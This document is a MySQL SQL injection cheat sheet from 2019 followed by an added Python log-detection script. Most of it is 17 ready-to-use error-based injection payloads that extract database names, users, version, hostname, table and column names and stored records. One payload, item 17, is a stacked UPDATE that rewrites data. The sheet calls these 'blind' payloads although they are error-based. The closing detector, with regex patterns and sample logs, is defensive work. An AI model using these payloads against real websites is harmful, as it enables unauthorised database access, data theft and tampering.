8/3/2019 MySQL Blind SQL Cheat Sheets
MySQL Blind SQL Cheat Sheets
0x1 Author : nishant
0x2 Compiled by : akukurt
Note: The data is fetched using Hex() and a type cast with cast() to make the query reliable and to avoid bad-character and format-string issues (for example 0x00 as the last byte of every value fetched). These payloads rely heavily on the information_schema database, so if you don't get the desired result, it just means that the remote database server doesn't have it.
1. To test blind injection
Code:
' and 'x'='x
2. To select the current database (output will be in hexadecimal; decode it to ASCII)
Code:
' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
3. To find the current user
Code:
1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
4. To find MySQL Version
Code:
1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(version() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
5. Find current database
Code:
1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
6. To find the system user
Code:
1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(system_user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
7. To find the hostname
Code:
1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(@@hostname as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
8. To find the installation directory
Code:
1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(@@basedir as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
9. To find the DB User
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROM information_schema.user_privileges LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
10. To find the databases
Note: Keep incrementing n (n, n+1, n+2, ...) as long as you keep getting a response.
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROM information_schema.user_privileges LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM information_schema.schemata LIMIT n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM information_schema.schemata LIMIT n+1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
11. To count the number of tables in the selected database
Note: Note this count as n. Replace the colored strings with the appropriate values.
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xhex_code_of_database_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
12. To get the table names in the selected database
Note: m-n means run this query with m, m+1, ..., n-1 in turn. Replace the colored strings with the appropriate values.
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0xhex_code_of_database_name limit m-n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
13. To get the number of columns in the selected table
Note: Note this count as n. Replace the colored strings with the appropriate values.
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
14. To get the column names of the selected table
Note: m-n means run this query with m, m+1, ..., n-1 in turn. Replace the colored strings with the appropriate values.
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(column_name as char)),0x27,0x7e) FROM information_schema.columns Where table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name limit m-n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
15. To count the number of records in a selected column
Note: Remember this count as n.
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `database_name`.table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
16. To fetch records from a selected column
Note: m-n means run this query with m, m+1, ..., n-1 in turn. Replace the colored strings with the appropriate values.
Code:
1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,Hex(cast(table_name.column_name as char)),0x27,0x7e) FROM `database_name`.table_name LIMIT m-n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
17. Update a record in the selected column
Code:
1';UPDATE table_name SET column_name=0xhex_code_of_new_record_value WHERE column_name=0xhex_code_of_old_record_value--
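Defender-side counterpart, added here as an example and not part of the original cheat sheet: every payload above works by forcing a MySQL duplicate-key error, so both the request shape (floor(rand(0)*2) with group by, Hex(cast(...)), information_schema lookups, and the stacked UPDATE of item 17) and the resulting server-side "Duplicate entry" message can be picked out of logs. The function names, the sample log lines and the 'group_key' / '<group_key>' key-name variants are my constructed assumptions, not anything from the sheet.

```python
import re
from urllib.parse import unquote_plus

# Request-side indicators of the double-query technique used throughout the sheet.
# Input is URL-decoded first; patterns tolerate case and whitespace variation.
REQUEST_PATTERNS = {
    "rand_groupby": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)[\s\S]*group\s+by", re.I),
    "hex_cast": re.compile(r"hex\s*\(\s*cast\s*\(", re.I),
    "info_schema": re.compile(r"information_schema\s*\.\s*(tables|schemata|columns|user_privileges)", re.I),
    "stacked_update": re.compile(r";\s*update\s+\S+\s+set\s+", re.I),  # item 17 shape
}

def score_request(line: str) -> list:
    """Return the names of all indicators that match one access-log line."""
    decoded = unquote_plus(line)
    return [name for name, rx in REQUEST_PATTERNS.items() if rx.search(decoded)]

# Server-side signal: the payload forces a duplicate-key error whose message carries the
# leaked value between the ~' ... '~ markers (0x7e,0x27 ... 0x27,0x7e), followed by the
# 0/1 from floor(rand(0)*2). Key name 'group_key' vs '<group_key>' is an assumption
# about version differences, so both spellings are accepted.
DUP_ENTRY = re.compile(r"Duplicate entry '~'([0-9A-Fa-f]+)'~[01]' for key '<?group_key>?'")

def leaked_from_error(line: str):
    """Decode the hex value exposed in a duplicate-entry error line, or None if absent."""
    m = DUP_ENTRY.search(line)
    if m is None:
        return None
    return bytes.fromhex(m.group(1)).decode("utf-8", errors="replace")

# Constructed sample log lines (not real traffic). The second mirrors item 4 of the sheet.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [03/Aug/2019:10:00:01 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512',
    "10.0.0.9 - - [03/Aug/2019:10:00:07 +0000] \"GET /item.php?id=1'%20and(select%201%20from(select%20count(*),"
    "concat((select%20(select%20concat(0x7e,0x27,Hex(cast(version()%20as%20char)),0x27,0x7e))%20from%20"
    "information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20"
    "group%20by%20x)a)%20and%20'1'='1 HTTP/1.1\" 500 0",
    "10.0.0.9 - - [03/Aug/2019:10:00:09 +0000] \"GET /item.php?id=1';UPDATE%20t%20SET%20c=0x41%20WHERE%20c=0x42-- HTTP/1.1\" 200 512",
]
SAMPLE_ERROR_LOG = [
    "2019-08-03T10:00:07Z app: SQLSTATE[23000]: 1062 Duplicate entry '~'352e372e3239'~1' for key 'group_key'",
]

if __name__ == "__main__":
    for line in SAMPLE_ACCESS_LOG:
        print(score_request(line) or "clean", "|", line[:60])
    for line in SAMPLE_ERROR_LOG:
        print("value leaked by the error:", leaked_from_error(line))
```

The error-log match is the higher-fidelity signal: request-side obfuscation changes the access-log text but not the server's error message, and decoding the hex tells incident responders exactly which value was disclosed.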